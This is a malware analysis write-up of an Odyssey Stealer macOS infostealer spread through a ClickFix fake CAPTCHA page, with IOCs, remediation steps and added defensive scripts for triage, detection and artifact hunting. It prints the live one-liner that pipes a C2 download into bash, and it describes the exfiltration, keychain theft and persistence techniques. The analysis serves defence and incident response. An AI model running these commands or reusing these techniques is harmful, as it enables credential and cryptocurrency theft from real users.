This repository contains an analysis of a macOS infostealer delivered via a ClickFix social engineering attack hosted on testdino.com. The malware is an instance of Odyssey Stealer (a rebrand of Poseidon Stealer, itself a fork of AMOS/Atomic Stealer) -- a sophisticated macOS credential and cryptocurrency theft tool distributed as Malware-as-a-Service (MaaS) by a Russian-speaking threat actor known as "Rodrigo."
The victim was tricked into pasting a malicious command into their macOS Terminal through a fake CAPTCHA verification page.
The attack originates from https://testdino.com, which presents a fake security verification page mimicking Cloudflare's "Just a moment..." interstitial. The page:
- Displays a fake "Complete the verification" prompt
- Instructs the user to open Terminal (Cmd+Space -> "Terminal")
- Provides a "Copy" button with a base64-encoded malicious command
- Tells the user to paste it into Terminal and press Return
The malicious payload is served dynamically through an API endpoint:
https://testdino.com/api/page/active?os=macos&domain=testdino.com
This endpoint returns platform-specific payloads for macOS, Windows, and a display command, allowing the attackers to target multiple operating systems from a single phishing page.
Step 1 - User pastes the command:
echo "Y3VybCAtcyBodHRwOi8vNzcuOTAuMTg1LjI0L2Qvcm9iZXJ0bzI2OTgyIHwgbm9odXAgYmFzaCAm" | base64 -d | bash
Step 2 - Decoded command:
curl -s http://77.90.185.24/d/roberto26982 | nohup bash &
This silently downloads the main malware payload from the C2 server and executes it in the background using nohup (so it persists even if the terminal is closed).
Step 3 - Callback verification:
After executing the payload, the command also pings a verification URL to confirm successful infection:
https://dildobegins.ink/api/verify?token=7f3cceade17ae06a16c156ca81e4196397cb671465d21c5f8ac13928eb2b9402
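The three steps above are exactly what an analyst has to unwrap when a user reports a pasted command, and the safe way to do it is to decode without ever piping the result into a shell. The following helper is an added example for this write-up, not code from the original analysis or from the malware: it extracts the base64 blob from an `echo "<blob>" | base64 -d | bash` line, decodes it to text only, and labels the behaviours of both the outer and the inner command. It assumes POSIX `sed` and a `base64` tool that accepts `-d` (GNU, current macOS) or `-D` (older macOS); the sample input is the one-liner from Step 1.

```shell
#!/usr/bin/env bash
# Added triage helper (not part of the original analysis): unwrap a ClickFix one-liner
# and label what the hidden command would do, WITHOUT executing any part of it.

# Pull the quoted base64 blob out of an `echo "<blob>" | base64 -d | bash` command line.
# Prints nothing when the line carries no such blob.
extract_b64_blob() {
  printf '%s\n' "$1" |
    sed -n 's|.*echo[[:space:]]*"\{0,1\}\([A-Za-z0-9+/=]\{16,\}\)"\{0,1\}.*|\1|p'
}

# Decode base64 to stdout as text. GNU/modern macOS take -d, older macOS only -D.
decode_b64() {
  printf '%s' "$1" | base64 -d 2>/dev/null || printf '%s' "$1" | base64 -D
}

# Command line in, decoded inner command out (empty when no blob was found).
decode_clickfix_command() {
  blob=$(extract_b64_blob "$1")
  [ -n "$blob" ] || return 0
  decode_b64 "$blob"
}

# Label the behaviours a command line exhibits. Prints a space-separated list of flags,
# or an empty line for a command that trips none of the rules.
classify_command() {
  cmd=$1
  flags=""
  case $cmd in
    # content decoded on the fly and fed straight into a shell interpreter
    *base64*-[dD]*"|"*sh*|*base64*--decode*"|"*sh*) flags="$flags decode-to-shell" ;;
  esac
  case $cmd in
    # remote content fetched and piped into a shell (curl|bash, wget|sh, ...)
    *curl*"|"*sh*|*wget*"|"*sh*) flags="$flags remote-script-to-shell" ;;
  esac
  case $cmd in
    # the download suppresses its own progress and error output
    *"curl -s"*|*"curl -fsSL"*|*--silent*) flags="$flags silent-download" ;;
  esac
  case $cmd in
    # detached from the terminal, so closing the window does not stop it
    *nohup*|*disown*|*"&") flags="$flags background-detach" ;;
  esac
  printf '%s\n' "${flags# }"
}

# Short report for an analyst looking at a suspicious clipboard or Terminal entry.
triage_clickfix() {
  line=$1
  inner=$(decode_clickfix_command "$line")
  printf 'outer flags : %s\n' "$(classify_command "$line")"
  if [ -n "$inner" ]; then
    printf 'decoded     : %s\n' "$inner"
    printf 'inner flags : %s\n' "$(classify_command "$inner")"
  else
    printf 'decoded     : (no base64 payload found)\n'
  fi
}

# Sample input: the exact Step 1 one-liner from the write-up.
SAMPLE='echo "Y3VybCAtcyBodHRwOi8vNzcuOTAuMTg1LjI0L2Qvcm9iZXJ0bzI2OTgyIHwgbm9odXAgYmFzaCAm" | base64 -d | bash'

triage_clickfix "$SAMPLE"
```

For the Step 1 line the report shows `decode-to-shell` on the outer command and `remote-script-to-shell silent-download background-detach` on the decoded one; that combination (decode, fetch, detach) is the ClickFix signature worth alerting on in shell history or endpoint telemetry, independent of the specific C2 address.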
The API endpoint reveals multiple C2 servers serving different builds:
| Platform | C2 Server | Build ID |
|---|---|---|
| macOS | http://77.90.185.24 | roberto26982 |
| Windows | http://213.209.159.175 | roberto34036 |
| Display (screenshot) | http://185.11.61.84 | roberto22134 |
File: roberto26982
Type: ASCII text (single-line obfuscated AppleScript executed via osascript -e)
Size: 50,862 bytes
MD5: e92ea9629e601141c2f4e7de80a6bb5d
SHA256: df5aa9a7e36f5b54c1c6f6f9c38d86b070eafbb02760a8133568d035d5ca35a1
The script is a massive one-liner that invokes osascript -e 'run script ...' containing an obfuscated AppleScript with randomized function and variable names (e.g., f9045185332467140346, v2764062242094160557).
Hardcoded values extracted from the malware:
Build ID: 00f0e61901a347e4b4ff82a3bfc2e21a
C2 Server: http://77.90.185.24
Username: roberto
Steal Notes: true
Steal Finder: true
Steal History: false
The malware displays a fake macOS authentication dialog:
"System Helper requires authorization. Please provide your device password to proceed with verification."
It loops indefinitely until the user enters the correct password, which it validates using `dscl . authonly`. The password is then used to:
- Extract Chrome's master password from Keychain (`security find-generic-password -ga "Chrome"`)
- Execute privileged operations via `sudo`
Chromium-based browsers targeted:
- Google Chrome, Chrome Beta, Chrome Canary, Chrome Dev
- Brave Browser
- Microsoft Edge
- Vivaldi
- Opera, OperaGX
- Arc
- CocCoc
- Chromium
Data stolen per browser profile:
- Cookies (including Network/Cookies)
- Login Data (saved passwords)
- Web Data (autofill, payment info)
- Local Extension Settings
- IndexedDB data
Gecko-based browsers targeted:
- Mozilla Firefox
- Waterfox
Data stolen:
- `cookies.sqlite`
- `formhistory.sqlite`
- `key4.db` (master password database)
- `logins.json`
- MetaMask extension data from Firefox container storage
Desktop wallet applications targeted:
- Electrum
- Coinomi
- Exodus
- Atomic Wallet
- Wasabi Wallet
- Ledger Live
- Monero
- Bitcoin Core
- Litecoin Core
- Dash Core
- Electrum-LTC
- Electron Cash
- Guarda
- Dogecoin Core
- Trezor Suite
- Sparrow Wallet
- Binance (app-store.json)
- TonKeeper (config.json)
Browser extensions targeted: 150+ cryptocurrency and authentication extensions including MetaMask, and many others identified by Chrome extension IDs.
- Safari cookies (`Cookies.binarycookies` from multiple locations)
- Safari Form Values (autofill data)
- Apple Notes (`NoteStore.sqlite` + WAL/SHM files, and optionally the full note content exported as HTML)
- macOS Keychain (`login.keychain-db` and UUID-based keychain folder)
- Desktop & Documents files (files matching configured extensions, up to 10MB)
- Notes media attachments (images/files attached to notes, up to 12MB)
The malware copies Telegram Desktop session data:
- `tdata/key_datas`
- All session storage directories and their map files
- Hardware UUID via `system_profiler SPHardwareDataType`
- Full system profile: `SPSoftwareDataType`, `SPHardwareDataType`, `SPDisplaysDataType`
- List of all installed applications in `/Applications`
- Current macOS username
All stolen data is staged to a random /tmp/<random>/ directory, then compressed:
ditto -c -k --sequesterRsrc /tmp/<random>/ /tmp/out.zip
Exfiltrated via HTTP POST to http://77.90.185.24/log with headers:
buildid: 00f0e61901a347e4b4ff82a3bfc2e21a
username: roberto
repeat: false
The upload retries up to 10 times with 60-second delays on failure.
After data exfiltration, if the user's password was captured, the malware:
- Downloads trojanized versions of Ledger Live, Ledger Wallet, and Trezor Suite from the C2
- Kills the legitimate application process
- Uses `sudo rm -r` to delete the real application
- Extracts the trojanized version into `/Applications`
These trojanized apps are designed to steal seed/recovery phrases.
The malware creates a LaunchDaemon for persistence:
- Generates a random label: `com.<random_number>`
- Writes a plist to `/tmp/starter`
- Copies it to `/Library/LaunchDaemons/com.<random>.plist` using sudo
- Bootstraps it with `launchctl bootstrap system`
- Falls back to `nohup` execution if the LaunchDaemon installation fails
The persistent payload contains a second-stage obfuscated AppleScript that:
- Registers with the C2 via `/api/v1/bot/joinsystem/`
- Polls for commands via `/api/v1/bot/actions/`
- Supports commands: `uninstall`, `repeat` (re-run steal), `doshell` (arbitrary shell execution), `enablesocks5` (SOCKS5 proxy)
- Writes an uninstall marker to `~/.uninstalled` if told to self-destruct
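Several of the behaviours described above (the `dscl . authonly` password check behind the fake dialog, the `security find-generic-password -ga "Chrome"` keychain read, the `ditto` staging into `/tmp`, the POST to `/log`, the `launchctl bootstrap system` of a numeric-label LaunchDaemon, the `/api/v1/bot/` polling, and the `osascript -e 'run script ...'` launcher) show up as process command lines on the endpoint. The scanner below is an added example for this write-up, not code from the original analysis: it runs a small rule set over process-execution events in a constructed `timestamp|parent|cmdline` format and prints one line per rule hit. The event lines, the parent names and the `curl -H "buildid: ..."` form of the upload are constructed for illustration; the report does not say which tool performs the POST.

```shell
#!/usr/bin/env bash
# Added detection example (not from the original write-up): rule set over process
# command lines, built from the indicators the report describes. Assumes POSIX sh
# utilities and grep -E.

# name<TAB>extended-regex pairs. Each regex targets one behaviour from the report.
list_rules() {
  printf '%s\t%s\n' \
    'fake-auth-validation'      'dscl[[:space:]]+\.[[:space:]]+authonly' \
    'chrome-keychain-dump'      'find-generic-password.*-g[a-z]*[[:space:]]+"?Chrome' \
    'tmp-staging-archive'       'ditto[[:space:]]+-c[[:space:]]+-k.*/tmp/.*\.zip' \
    'c2-exfil-post'             '77\.90\.185\.24/log|buildid:' \
    'launchdaemon-numeric-label' 'launchctl[[:space:]]+bootstrap[[:space:]]+system.*/com\.[0-9]+\.plist' \
    'bot-c2-api'                '/api/v1/bot/(joinsystem|actions)/' \
    'inline-osascript'          'osascript.*-e.*run[[:space:]]+script'
}

# Print the name of every rule a single command line matches (one per line).
match_rules() {
  cmd=$1
  list_rules | while IFS=$(printf '\t') read -r name regex; do
    if printf '%s\n' "$cmd" | grep -Eq -- "$regex"; then
      printf '%s\n' "$name"
    fi
  done || true
}

# Read "timestamp|parent|cmdline" events from stdin; emit "ts<TAB>rule<TAB>parent<TAB>cmd"
# for every (event, rule) hit. Only the first two '|' are separators, so a cmdline
# containing pipes is kept intact.
scan_process_events() {
  while IFS= read -r line; do
    [ -n "$line" ] || continue
    ts=${line%%|*};     rest=${line#*|}
    parent=${rest%%|*}; cmd=${rest#*|}
    for rule in $(match_rules "$cmd"); do
      printf '%s\t%s\t%s\t%s\n' "$ts" "$rule" "$parent" "$cmd"
    done
  done
}

# Constructed sample telemetry (not real captured data). The last two lines are benign
# comparators: a plain directory listing and a LaunchDaemon with a normal reverse-DNS label.
EVENTS=$(cat <<'EOF'
2026-01-09T10:14:00Z|bash|osascript -e 'run script "<obfuscated applescript placeholder>"'
2026-01-09T10:14:02Z|osascript|dscl . authonly jdoe
2026-01-09T10:14:05Z|osascript|security find-generic-password -ga "Chrome"
2026-01-09T10:15:10Z|osascript|ditto -c -k --sequesterRsrc /tmp/a1b2c3/ /tmp/out.zip
2026-01-09T10:15:12Z|osascript|curl -X POST -H "buildid: 00f0e61901a347e4b4ff82a3bfc2e21a" http://77.90.185.24/log
2026-01-09T10:15:40Z|sudo|launchctl bootstrap system /Library/LaunchDaemons/com.48213.plist
2026-01-09T10:16:00Z|osascript|curl http://77.90.185.24/api/v1/bot/joinsystem/
2026-01-09T10:16:30Z|Terminal|ls -la /Applications
2026-01-09T10:17:00Z|sudo|launchctl bootstrap system /Library/LaunchDaemons/com.vendor.agent.plist
EOF
)

printf '%s\n' "$EVENTS" | scan_process_events
```

`dscl . authonly` and `security find-generic-password` both have legitimate administrative uses, so on a real fleet these two rules are best used with the parent column: an `osascript` parent for either is what distinguishes the fake dialog described above from an admin at a terminal. The `c2-exfil-post` and `bot-c2-api` rules are tied to this campaign's infrastructure and will need updating as the C2 moves; the staging, numeric-label LaunchDaemon and inline-osascript rules describe the technique rather than the infrastructure.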
| Type | Value | Description |
|---|---|---|
| IP | 77.90.185.24 | Primary macOS C2 server |
| IP | 213.209.159.175 | Windows C2 server |
| IP | 185.11.61.84 | Secondary C2 server |
| Domain | dildobegins.ink | Infection verification callback |
| Domain | testdino.com | Phishing/ClickFix page |
| URL | http://77.90.185.24/d/roberto26982 | macOS payload URL |
| URL | http://77.90.185.24/log | Data exfiltration endpoint |
| URL | http://77.90.185.24/api/v1/bot/joinsystem/ | Bot registration endpoint |
| URL | http://77.90.185.24/api/v1/bot/actions/ | Bot command polling endpoint |
| URL | http://77.90.185.24/otherassets/ledger.zip | Trojanized Ledger Live |
| URL | http://77.90.185.24/otherassets/trezor.zip | Trojanized Trezor Suite |
| URL | http://77.90.185.24/otherassets/socks | SOCKS5 proxy binary |
| Type | Value | Description |
|---|---|---|
| MD5 | e92ea9629e601141c2f4e7de80a6bb5d | Main payload hash |
| SHA256 | df5aa9a7e36f5b54c1c6f6f9c38d86b070eafbb02760a8133568d035d5ca35a1 | Main payload hash |
| Build ID | 00f0e61901a347e4b4ff82a3bfc2e21a | Campaign identifier |
| Path | Description |
|---|---|
| /Library/LaunchDaemons/com.<random>.plist | Persistence mechanism |
| /tmp/out.zip | Staged exfiltration archive |
| /tmp/starter | Temporary LaunchDaemon plist |
| /tmp/socks | SOCKS5 proxy binary |
| ~/.username | Stored attacker username |
| ~/.chost | Stored C2 URL |
| ~/.botid | Bot registration ID |
| ~/.lastaction | Last C2 action timestamp |
| ~/.pwd | Cached stolen password |
| ~/.uninstalled | Uninstall marker |
Yes, this is part of a widespread and well-documented campaign. Odyssey Stealer (and its predecessors AMOS/Poseidon) represents one of the most active macOS threat families in 2025-2026:
- Palo Alto Unit42 reported a 101% increase in macOS infostealers between the last two quarters of 2024, with Atomic/Poseidon/Odyssey being the dominant family.
- Forcepoint X-Labs published the initial Odyssey Stealer analysis in August 2025, documenting a campaign impersonating TradingView.
- CloudSEK discovered Microsoft Teams impersonation campaigns using the same ClickFix technique (December 2025).
- CYFIRMA published a detailed technical analysis revealing the malware's control panel and Russian-hosted infrastructure.
- Red Canary wrote a guide for distinguishing Atomic, Odyssey, and Poseidon stealers on macOS.
- Malwarebytes reported AMOS and Lumma stealers actively spreading on Reddit through crypto and trading subreddits.
- Huntress documented an AI-poisoned search result attack in December 2025 where victims ran AMOS after following instructions from a ChatGPT conversation found via Google Search.
- SC Media reported 85+ Google Ads-promoted domains spoofing Homebrew, LogMeIn, and TradingView to deliver AMOS and Odyssey.
- The Hacker News reported on the Crazy Evil Gang, a Russian-speaking group using AMOS and other stealers for cryptocurrency theft via social media scams.
ClickFix has become one of the most widely used initial access methods, accounting for 47% of attacks observed by Microsoft in recent threat reports.
If your friend (or anyone) executed this command, they should assume full compromise and take immediate action:
- Disconnect from the internet to stop ongoing data exfiltration
- Do NOT enter passwords into any prompts -- the malware will loop a fake auth dialog
- Force-quit Terminal and any suspicious processes
- Change ALL passwords -- especially:
  - Apple ID / iCloud
  - Email accounts
  - Banking and financial services
  - Every account saved in any browser
- Revoke all active browser sessions (Google, GitHub, social media, etc.)
- Enable/reset 2FA on all accounts using a fresh authenticator app
- Move cryptocurrency funds immediately from all wallets that were on the machine to new wallets generated on a clean device
  - Treat ALL seed phrases/private keys as compromised
  - Generate entirely new wallets
- Remove LaunchDaemons: check `/Library/LaunchDaemons/` for any `com.<5-digit-number>.plist` files
- Remove persistence files: delete `~/.username`, `~/.chost`, `~/.botid`, `~/.lastaction`, `~/.pwd`
- Verify applications: particularly check if Ledger Live, Ledger Wallet, or Trezor Suite were replaced (re-download from official sources)
- Check for SOCKS5 proxy: remove `/tmp/socks` if present
- Full OS reinstall is recommended for highest assurance -- the malware had root access if the password was entered
- Monitor financial accounts and crypto wallets for unauthorized transactions
- Check "Have I Been Pwned" and similar services for credential leaks
- Report the incident to relevant authorities and the hosting providers of the C2 infrastructure
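The LaunchDaemon, `/tmp` and home-directory items in the checklist above (and in the persistence section and file-path table earlier) can be hunted for in one pass. The script below is an added example for this write-up, not code from the original analysis: it is read-only, reports every artifact it finds, and takes the filesystem root and home directory as parameters so it can be pointed at a mounted image of the affected Mac or at a test tree. It flags any LaunchDaemon whose label is `com.` followed only by digits, which generalises the checklist's "5-digit number" to the `com.<random_number>` form the persistence section describes. The `codesign` check on the wallet apps is my own addition: the report says the apps are replaced with trojanized copies, and the assumption here is that a replaced bundle no longer passes Apple's signature verification, so a failure is a reason to re-download, not proof either way.

```shell
#!/usr/bin/env bash
# Added hunt script (not part of the original analysis). Read-only: it lists artifacts,
# it does not delete them. Assumes POSIX sh utilities; codesign is used only on macOS.

# Usage: hunt_odyssey_artifacts [ROOT] [HOME_DIR]
#   ROOT     prefix of the filesystem to inspect ("" = the live system)
#   HOME_DIR the victim's home directory (default: $HOME)
hunt_odyssey_artifacts() {
  root=${1:-}
  home=${2:-$HOME}
  found=0

  # 1. LaunchDaemons whose label is "com." followed only by digits (com.<random_number>).
  for p in "$root"/Library/LaunchDaemons/com.*.plist; do
    [ -e "$p" ] || continue
    label=${p##*/}; label=${label#com.}; label=${label%.plist}
    case $label in
      ''|*[!0-9]*) ;;    # normal reverse-DNS label such as com.vendor.agent: ignore
      *) printf 'FOUND launchdaemon %s\n' "$p"; found=$((found+1)) ;;
    esac
  done

  # 2. Staging and helper files the report places under /tmp.
  for f in /tmp/starter /tmp/out.zip /tmp/socks; do
    if [ -e "$root$f" ]; then
      printf 'FOUND tmpfile %s\n' "$root$f"; found=$((found+1))
    fi
  done

  # 3. Hidden marker/cache files in the victim's home directory.
  for f in .username .chost .botid .lastaction .pwd .uninstalled; do
    if [ -e "$home/$f" ]; then
      printf 'FOUND marker %s\n' "$home/$f"; found=$((found+1))
    fi
  done

  printf 'TOTAL %d\n' "$found"
}

# Signature check for the wallet apps the report says get replaced. A bundle that fails
# verification, or one that is missing, should be re-downloaded from the vendor.
# (Assumption, not from the report: a trojanized copy fails codesign --verify.)
verify_wallet_apps() {
  command -v codesign >/dev/null 2>&1 || { echo "codesign not available (not macOS)"; return 0; }
  for app in "Ledger Live" "Ledger Wallet" "Trezor Suite"; do
    path="/Applications/$app.app"
    [ -d "$path" ] || continue
    if codesign --verify --deep --strict "$path" 2>/dev/null; then
      printf 'OK       %s\n' "$path"
    else
      printf 'SUSPECT  %s (signature verification failed)\n' "$path"
    fi
  done
}

hunt_odyssey_artifacts "$@"
verify_wallet_apps
```

Run it with no arguments on the affected machine (with sudo, so `/Library/LaunchDaemons` is readable) or as `hunt_odyssey_artifacts /Volumes/image /Volumes/image/Users/<victim>` against a mounted image. A `TOTAL 0` only means these particular files are absent; given that the malware had the user's password, the checklist's recommendation of a full OS reinstall still stands.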
- Forcepoint X-Labs: Odyssey Stealer ClickFix Analysis (Aug 2025)
- CloudSEK: Microsoft Teams Impersonation Campaign (Dec 2025)
- CYFIRMA: Odyssey Stealer Technical Analysis (Jul 2025)
- Red Canary: Distinguishing Atomic, Odyssey, and Poseidon Stealers
- Palo Alto Unit42: macOS Stealers on the Rise
- SC Media: Poseidon Stealer Rebranded as Odyssey Stealer (Jun 2025)
- Malwarebytes: AMOS and Lumma Stealers Spread via Reddit (Mar 2025)
- Huntress: AMOS via AI-Poisoned Search Results (Dec 2025)
- The Hacker News: ClickFix Attacks Expand (Jan 2026)
- PCRisk: Odyssey Stealer Removal Guide
- Emsisoft: ClickFix Malware on macOS (Sep 2025)